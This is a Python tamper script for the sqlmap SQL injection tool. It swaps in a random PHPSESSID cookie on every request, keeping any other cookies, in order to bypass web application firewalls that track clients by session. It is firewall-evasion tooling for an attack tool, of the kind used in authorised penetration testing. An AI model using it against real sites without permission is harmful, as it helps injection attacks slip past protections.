sqlmap is an automatic SQL injection and database takeover tool.
This tamper script can be used to bypass some web application firewalls by sending a random session cookie with each request.
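#!/usr/bin/env python

"""
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission

author: 3H34N(nezami.me)
"""

import random
import string

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

# Name of the session cookie that is replaced with a random value on every request
SESSION_COOKIE = "PHPSESSID"


def dependencies():
    pass


def randomsession(length=32):
    """
    Build a 'PHPSESSID=<value>' cookie pair with a random value.

    :param length: number of characters in the generated value (default 32,
        the length the original script used)
    :return: the cookie pair as a string, e.g. 'PHPSESSID=k3j...'

    The value is drawn from [a-z0-9]. The original used
    ``string.ascii_letters.lower()``, which lists every lowercase letter twice
    and so skews the draw towards letters; ``string.ascii_lowercase`` gives a
    uniform alphabet. ``random`` is adequate here: the value only has to look
    like a fresh session id, it is not used as a secret.
    """
    chars = string.ascii_lowercase + string.digits
    value = ''.join(random.choice(chars) for _ in range(length))
    return "%s=%s" % (SESSION_COOKIE, value)


def tamper(payload, **kwargs):
    """
    Send a fresh random 'PHPSESSID' cookie with every request to bypass WAF
    (usually application based) protection that tracks clients by session.

    :param payload: the injection payload; returned unchanged
    :param kwargs: sqlmap passes the outgoing request headers as ``headers``;
        that dict is mutated in place
    :return: ``payload`` unchanged

    Only the session cookie is replaced. Any other cookies already present in
    the 'Cookie' header (for example ones supplied with --cookie) are kept, so
    an authenticated test is not silently logged out. When no 'Cookie' header
    exists the result is the same 'PHPSESSID=<value>' the original produced.
    """
    headers = kwargs.get("headers", {})
    existing = headers.get("Cookie", "") or ""
    # Drop a previous PHPSESSID pair (if any) but keep every other cookie.
    kept = []
    for pair in existing.split(";"):
        pair = pair.strip()
        if pair and not pair.startswith(SESSION_COOKIE + "="):
            kept.append(pair)
    kept.append(randomsession())
    headers["Cookie"] = "; ".join(kept)
    return payload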